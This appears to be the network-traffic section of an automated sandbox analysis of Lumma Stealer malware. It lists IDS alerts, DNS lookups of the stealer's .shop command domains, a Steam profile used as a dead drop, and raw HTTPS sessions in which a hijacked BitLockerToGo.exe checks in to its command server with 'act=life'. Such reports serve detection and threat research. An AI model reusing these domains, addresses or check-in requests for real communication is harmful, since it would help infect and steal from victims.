2024-10-13T21:34:55.590397+0200	2055481	ET MALWARE Lumma Stealer Domain in DNS Lookup (stagedchheiqwo .shop)	1	192.168.2.8	59565	1.1.1.1	53	UDP
2024-10-13T21:34:55.602404+0200	2055482	ET MALWARE Lumma Stealer Domain in DNS Lookup (stamppreewntnq .shop)	1	192.168.2.8	54706	1.1.1.1	53	UDP
2024-10-13T21:34:55.613740+0200	2055474	ET MALWARE Lumma Stealer Domain in DNS Lookup (caffegclasiqwp .shop)	1	192.168.2.8	55171	1.1.1.1	53	UDP
2024-10-13T21:34:56.882116+0200	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.8	49705	104.102.49.254	443	TCP
2024-10-13T21:34:57.700028+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.8	49706	172.67.206.204	443	TCP
2024-10-13T21:34:57.700028+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.8	49706	172.67.206.204	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2024 21:34:54.311671972 CEST	49704	443	192.168.2.8	188.114.97.3
Oct 13, 2024 21:34:54.311721087 CEST	443	49704	188.114.97.3	192.168.2.8
Oct 13, 2024 21:34:54.311800957 CEST	49704	443	192.168.2.8	188.114.97.3
Oct 13, 2024 21:34:54.314722061 CEST	49704	443	192.168.2.8	188.114.97.3
Oct 13, 2024 21:34:54.314742088 CEST	443	49704	188.114.97.3	192.168.2.8
Oct 13, 2024 21:34:54.817801952 CEST	443	49704	188.114.97.3	192.168.2.8
Oct 13, 2024 21:34:54.817876101 CEST	49704	443	192.168.2.8	188.114.97.3
Oct 13, 2024 21:34:54.835953951 CEST	49704	443	192.168.2.8	188.114.97.3
Oct 13, 2024 21:34:54.835992098 CEST	443	49704	188.114.97.3	192.168.2.8
Oct 13, 2024 21:34:54.836520910 CEST	443	49704	188.114.97.3	192.168.2.8
Oct 13, 2024 21:34:54.890788078 CEST	49704	443	192.168.2.8	188.114.97.3
Oct 13, 2024 21:34:54.933191061 CEST	49704	443	192.168.2.8	188.114.97.3
Oct 13, 2024 21:34:54.933218002 CEST	49704	443	192.168.2.8	188.114.97.3
Oct 13, 2024 21:34:54.933402061 CEST	443	49704	188.114.97.3	192.168.2.8
Oct 13, 2024 21:34:55.399507046 CEST	443	49704	188.114.97.3	192.168.2.8
Oct 13, 2024 21:34:55.399626017 CEST	443	49704	188.114.97.3	192.168.2.8
Oct 13, 2024 21:34:55.399697065 CEST	49704	443	192.168.2.8	188.114.97.3
Oct 13, 2024 21:34:55.402395010 CEST	49704	443	192.168.2.8	188.114.97.3
Oct 13, 2024 21:34:55.402424097 CEST	443	49704	188.114.97.3	192.168.2.8
Oct 13, 2024 21:34:55.638299942 CEST	49705	443	192.168.2.8	104.102.49.254
Oct 13, 2024 21:34:55.638351917 CEST	443	49705	104.102.49.254	192.168.2.8
Oct 13, 2024 21:34:55.638412952 CEST	49705	443	192.168.2.8	104.102.49.254
Oct 13, 2024 21:34:55.639188051 CEST	49705	443	192.168.2.8	104.102.49.254
Oct 13, 2024 21:34:55.639205933 CEST	443	49705	104.102.49.254	192.168.2.8
Oct 13, 2024 21:34:56.349263906 CEST	443	49705	104.102.49.254	192.168.2.8
Oct 13, 2024 21:34:56.349440098 CEST	49705	443	192.168.2.8	104.102.49.254
Oct 13, 2024 21:34:56.352058887 CEST	49705	443	192.168.2.8	104.102.49.254
Oct 13, 2024 21:34:56.352072001 CEST	443	49705	104.102.49.254	192.168.2.8
Oct 13, 2024 21:34:56.352482080 CEST	443	49705	104.102.49.254	192.168.2.8
Oct 13, 2024 21:34:56.353818893 CEST	49705	443	192.168.2.8	104.102.49.254
Oct 13, 2024 21:34:56.395416021 CEST	443	49705	104.102.49.254	192.168.2.8
Oct 13, 2024 21:34:56.882179022 CEST	443	49705	104.102.49.254	192.168.2.8
Oct 13, 2024 21:34:56.882241011 CEST	443	49705	104.102.49.254	192.168.2.8
Oct 13, 2024 21:34:56.882281065 CEST	49705	443	192.168.2.8	104.102.49.254
Oct 13, 2024 21:34:56.882283926 CEST	443	49705	104.102.49.254	192.168.2.8
Oct 13, 2024 21:34:56.882316113 CEST	443	49705	104.102.49.254	192.168.2.8
Oct 13, 2024 21:34:56.882324934 CEST	49705	443	192.168.2.8	104.102.49.254
Oct 13, 2024 21:34:56.882355928 CEST	49705	443	192.168.2.8	104.102.49.254
Oct 13, 2024 21:34:56.882378101 CEST	49705	443	192.168.2.8	104.102.49.254
Oct 13, 2024 21:34:57.018846989 CEST	443	49705	104.102.49.254	192.168.2.8
Oct 13, 2024 21:34:57.018912077 CEST	443	49705	104.102.49.254	192.168.2.8
Oct 13, 2024 21:34:57.019090891 CEST	49705	443	192.168.2.8	104.102.49.254
Oct 13, 2024 21:34:57.019090891 CEST	49705	443	192.168.2.8	104.102.49.254
Oct 13, 2024 21:34:57.019129992 CEST	443	49705	104.102.49.254	192.168.2.8
Oct 13, 2024 21:34:57.019187927 CEST	49705	443	192.168.2.8	104.102.49.254
Oct 13, 2024 21:34:57.025635958 CEST	443	49705	104.102.49.254	192.168.2.8
Oct 13, 2024 21:34:57.025722027 CEST	49705	443	192.168.2.8	104.102.49.254
Oct 13, 2024 21:34:57.025738001 CEST	443	49705	104.102.49.254	192.168.2.8
Oct 13, 2024 21:34:57.025791883 CEST	49705	443	192.168.2.8	104.102.49.254
Oct 13, 2024 21:34:57.025804043 CEST	443	49705	104.102.49.254	192.168.2.8
Oct 13, 2024 21:34:57.025885105 CEST	443	49705	104.102.49.254	192.168.2.8
Oct 13, 2024 21:34:57.025937080 CEST	49705	443	192.168.2.8	104.102.49.254
Oct 13, 2024 21:34:57.026242971 CEST	49705	443	192.168.2.8	104.102.49.254
Oct 13, 2024 21:34:57.026264906 CEST	443	49705	104.102.49.254	192.168.2.8
Oct 13, 2024 21:34:57.026274920 CEST	49705	443	192.168.2.8	104.102.49.254
Oct 13, 2024 21:34:57.026282072 CEST	443	49705	104.102.49.254	192.168.2.8
Oct 13, 2024 21:34:57.041579962 CEST	49706	443	192.168.2.8	172.67.206.204
Oct 13, 2024 21:34:57.041630030 CEST	443	49706	172.67.206.204	192.168.2.8
Oct 13, 2024 21:34:57.041721106 CEST	49706	443	192.168.2.8	172.67.206.204
Oct 13, 2024 21:34:57.042078018 CEST	49706	443	192.168.2.8	172.67.206.204
Oct 13, 2024 21:34:57.042093039 CEST	443	49706	172.67.206.204	192.168.2.8
Oct 13, 2024 21:34:57.527949095 CEST	443	49706	172.67.206.204	192.168.2.8
Oct 13, 2024 21:34:57.528055906 CEST	49706	443	192.168.2.8	172.67.206.204
Oct 13, 2024 21:34:57.529535055 CEST	49706	443	192.168.2.8	172.67.206.204
Oct 13, 2024 21:34:57.529545069 CEST	443	49706	172.67.206.204	192.168.2.8
Oct 13, 2024 21:34:57.530039072 CEST	443	49706	172.67.206.204	192.168.2.8
Oct 13, 2024 21:34:57.531946898 CEST	49706	443	192.168.2.8	172.67.206.204
Oct 13, 2024 21:34:57.531996965 CEST	49706	443	192.168.2.8	172.67.206.204
Oct 13, 2024 21:34:57.532048941 CEST	443	49706	172.67.206.204	192.168.2.8
Oct 13, 2024 21:34:57.700077057 CEST	443	49706	172.67.206.204	192.168.2.8
Oct 13, 2024 21:34:57.700198889 CEST	443	49706	172.67.206.204	192.168.2.8
Oct 13, 2024 21:34:57.700279951 CEST	49706	443	192.168.2.8	172.67.206.204
Oct 13, 2024 21:34:57.700288057 CEST	443	49706	172.67.206.204	192.168.2.8
Oct 13, 2024 21:34:57.700324059 CEST	443	49706	172.67.206.204	192.168.2.8
Oct 13, 2024 21:34:57.700414896 CEST	49706	443	192.168.2.8	172.67.206.204
Oct 13, 2024 21:34:57.700428009 CEST	443	49706	172.67.206.204	192.168.2.8
Oct 13, 2024 21:34:57.700617075 CEST	443	49706	172.67.206.204	192.168.2.8
Oct 13, 2024 21:34:57.700784922 CEST	49706	443	192.168.2.8	172.67.206.204
Oct 13, 2024 21:34:57.700784922 CEST	49706	443	192.168.2.8	172.67.206.204
Oct 13, 2024 21:34:57.700851917 CEST	49706	443	192.168.2.8	172.67.206.204
Oct 13, 2024 21:34:57.700870991 CEST	443	49706	172.67.206.204	192.168.2.8
Oct 13, 2024 21:34:57.803797960 CEST	49707	443	192.168.2.8	172.67.206.204
Oct 13, 2024 21:34:57.803841114 CEST	443	49707	172.67.206.204	192.168.2.8
Oct 13, 2024 21:34:57.803991079 CEST	49707	443	192.168.2.8	172.67.206.204
Oct 13, 2024 21:34:57.804440022 CEST	49707	443	192.168.2.8	172.67.206.204
Oct 13, 2024 21:34:57.804452896 CEST	443	49707	172.67.206.204	192.168.2.8
Oct 13, 2024 21:34:58.234819889 CEST	49707	443	192.168.2.8	172.67.206.204

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2024 21:34:54.291326046 CEST	65334	53	192.168.2.8	1.1.1.1
Oct 13, 2024 21:34:54.306499958 CEST	53	65334	1.1.1.1	192.168.2.8
Oct 13, 2024 21:34:55.406569958 CEST	50841	53	192.168.2.8	1.1.1.1
Oct 13, 2024 21:34:55.415173054 CEST	53	50841	1.1.1.1	192.168.2.8
Oct 13, 2024 21:34:55.444031954 CEST	61114	53	192.168.2.8	1.1.1.1
Oct 13, 2024 21:34:55.454756975 CEST	53	61114	1.1.1.1	192.168.2.8
Oct 13, 2024 21:34:55.457364082 CEST	59587	53	192.168.2.8	1.1.1.1
Oct 13, 2024 21:34:55.468015909 CEST	53	59587	1.1.1.1	192.168.2.8
Oct 13, 2024 21:34:55.470726967 CEST	50525	53	192.168.2.8	1.1.1.1
Oct 13, 2024 21:34:55.480341911 CEST	53	50525	1.1.1.1	192.168.2.8
Oct 13, 2024 21:34:55.482825994 CEST	52207	53	192.168.2.8	1.1.1.1
Oct 13, 2024 21:34:55.588433981 CEST	53	52207	1.1.1.1	192.168.2.8
Oct 13, 2024 21:34:55.590396881 CEST	59565	53	192.168.2.8	1.1.1.1
Oct 13, 2024 21:34:55.600832939 CEST	53	59565	1.1.1.1	192.168.2.8
Oct 13, 2024 21:34:55.602404118 CEST	54706	53	192.168.2.8	1.1.1.1
Oct 13, 2024 21:34:55.611757994 CEST	53	54706	1.1.1.1	192.168.2.8
Oct 13, 2024 21:34:55.613739967 CEST	55171	53	192.168.2.8	1.1.1.1
Oct 13, 2024 21:34:55.623109102 CEST	53	55171	1.1.1.1	192.168.2.8
Oct 13, 2024 21:34:55.629045010 CEST	61360	53	192.168.2.8	1.1.1.1
Oct 13, 2024 21:34:55.636118889 CEST	53	61360	1.1.1.1	192.168.2.8
Oct 13, 2024 21:34:57.028378010 CEST	54075	53	192.168.2.8	1.1.1.1
Oct 13, 2024 21:34:57.040838957 CEST	53	54075	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 13, 2024 21:34:54.291326046 CEST	192.168.2.8	1.1.1.1	0xd1fb	Standard query (0)	nippydxmnwquo.shop	A (IP address)	IN (0x0001)	false
Oct 13, 2024 21:34:55.406569958 CEST	192.168.2.8	1.1.1.1	0x1083	Standard query (0)	locatedblsoqp.shop	A (IP address)	IN (0x0001)	false
Oct 13, 2024 21:34:55.444031954 CEST	192.168.2.8	1.1.1.1	0x5273	Standard query (0)	traineiwnqo.shop	A (IP address)	IN (0x0001)	false
Oct 13, 2024 21:34:55.457364082 CEST	192.168.2.8	1.1.1.1	0x648d	Standard query (0)	condedqpwqm.shop	A (IP address)	IN (0x0001)	false
Oct 13, 2024 21:34:55.470726967 CEST	192.168.2.8	1.1.1.1	0xb678	Standard query (0)	evoliutwoqm.shop	A (IP address)	IN (0x0001)	false
Oct 13, 2024 21:34:55.482825994 CEST	192.168.2.8	1.1.1.1	0x307a	Standard query (0)	millyscroqwp.shop	A (IP address)	IN (0x0001)	false
Oct 13, 2024 21:34:55.590396881 CEST	192.168.2.8	1.1.1.1	0x5bf	Standard query (0)	stagedchheiqwo.shop	A (IP address)	IN (0x0001)	false
Oct 13, 2024 21:34:55.602404118 CEST	192.168.2.8	1.1.1.1	0x3c95	Standard query (0)	stamppreewntnq.shop	A (IP address)	IN (0x0001)	false
Oct 13, 2024 21:34:55.613739967 CEST	192.168.2.8	1.1.1.1	0x2da	Standard query (0)	caffegclasiqwp.shop	A (IP address)	IN (0x0001)	false
Oct 13, 2024 21:34:55.629045010 CEST	192.168.2.8	1.1.1.1	0x31c8	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Oct 13, 2024 21:34:57.028378010 CEST	192.168.2.8	1.1.1.1	0xbc9	Standard query (0)	sergei-esenin.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 13, 2024 21:34:54.306499958 CEST	1.1.1.1	192.168.2.8	0xd1fb	No error (0)	nippydxmnwquo.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 13, 2024 21:34:54.306499958 CEST	1.1.1.1	192.168.2.8	0xd1fb	No error (0)	nippydxmnwquo.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 13, 2024 21:34:55.415173054 CEST	1.1.1.1	192.168.2.8	0x1083	Name error (3)	locatedblsoqp.shop	none	none	A (IP address)	IN (0x0001)	false
Oct 13, 2024 21:34:55.454756975 CEST	1.1.1.1	192.168.2.8	0x5273	Name error (3)	traineiwnqo.shop	none	none	A (IP address)	IN (0x0001)	false
Oct 13, 2024 21:34:55.468015909 CEST	1.1.1.1	192.168.2.8	0x648d	Name error (3)	condedqpwqm.shop	none	none	A (IP address)	IN (0x0001)	false
Oct 13, 2024 21:34:55.480341911 CEST	1.1.1.1	192.168.2.8	0xb678	Name error (3)	evoliutwoqm.shop	none	none	A (IP address)	IN (0x0001)	false
Oct 13, 2024 21:34:55.588433981 CEST	1.1.1.1	192.168.2.8	0x307a	Name error (3)	millyscroqwp.shop	none	none	A (IP address)	IN (0x0001)	false
Oct 13, 2024 21:34:55.600832939 CEST	1.1.1.1	192.168.2.8	0x5bf	Name error (3)	stagedchheiqwo.shop	none	none	A (IP address)	IN (0x0001)	false
Oct 13, 2024 21:34:55.611757994 CEST	1.1.1.1	192.168.2.8	0x3c95	Name error (3)	stamppreewntnq.shop	none	none	A (IP address)	IN (0x0001)	false
Oct 13, 2024 21:34:55.623109102 CEST	1.1.1.1	192.168.2.8	0x2da	Name error (3)	caffegclasiqwp.shop	none	none	A (IP address)	IN (0x0001)	false
Oct 13, 2024 21:34:55.636118889 CEST	1.1.1.1	192.168.2.8	0x31c8	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Oct 13, 2024 21:34:57.040838957 CEST	1.1.1.1	192.168.2.8	0xbc9	No error (0)	sergei-esenin.com		172.67.206.204	A (IP address)	IN (0x0001)	false
Oct 13, 2024 21:34:57.040838957 CEST	1.1.1.1	192.168.2.8	0xbc9	No error (0)	sergei-esenin.com		104.21.53.8	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

nippydxmnwquo.shop

steamcommunity.com

sergei-esenin.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49704	188.114.97.3	443	3904	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-13 19:34:54 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: nippydxmnwquo.shop
2024-10-13 19:34:54 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-13 19:34:55 UTC	831	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 19:34:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5pi1b3uv0ek9f8n2udu3bt3vde; expires=Thu, 06 Feb 2025 13:21:34 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lafplbC2C%2BUB%2F5Kkn2FFQYeC%2F2rIRQbOZv8PAlzGczqJa93%2FOA%2Bfmfy0MFv5ha7YnoVY6YQhH2gFRzDzlj2ESxMrrzuAQ%2BU7fyrhOlCGGqE87gwkf5VCwu1B4bCT8VJKcl51ApA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d21c511ad3f42b7-EWR alt-svc: h3=":443"; ma=86400
2024-10-13 19:34:55 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-13 19:34:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49705	104.102.49.254	443	3904	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-13 19:34:56 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-10-13 19:34:56 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Sun, 13 Oct 2024 19:34:56 GMT Content-Length: 34837 Connection: close Set-Cookie: sessionid=de0dafb87041ec5b1e337cce; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-10-13 19:34:56 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-10-13 19:34:57 UTC	16384	IN	Data Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
2024-10-13 19:34:57 UTC	3768	IN	Data Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 Data Ascii: <div class="profile_summary_footer"><span data-panel="{"focusable":true,"clickOnActivate":true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
2024-10-13 19:34:57 UTC	171	IN	Data Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49706	172.67.206.204	443	3904	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-13 19:34:57 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: sergei-esenin.com
2024-10-13 19:34:57 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-13 19:34:57 UTC	561	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 19:34:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JArtTZqR%2B%2FbLVgCUcjmm4smXrGtBUNWgRATfNlxTLj9gMiXSZW1O%2FFBK5UeFhKNo8ypF%2B05fxSYR7DmRZqiDm3gTHA4LjK4yk1yNg7LIWwq%2Fs4iHHTdhb4kiDqP8%2BX%2FKkyWvzg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d21c5222f8f72b7-EWR
2024-10-13 19:34:57 UTC	808	IN	Data Raw: 31 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1151<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-10-13 19:34:57 UTC	1369	IN	Data Raw: 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 Data Ascii: gi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElement
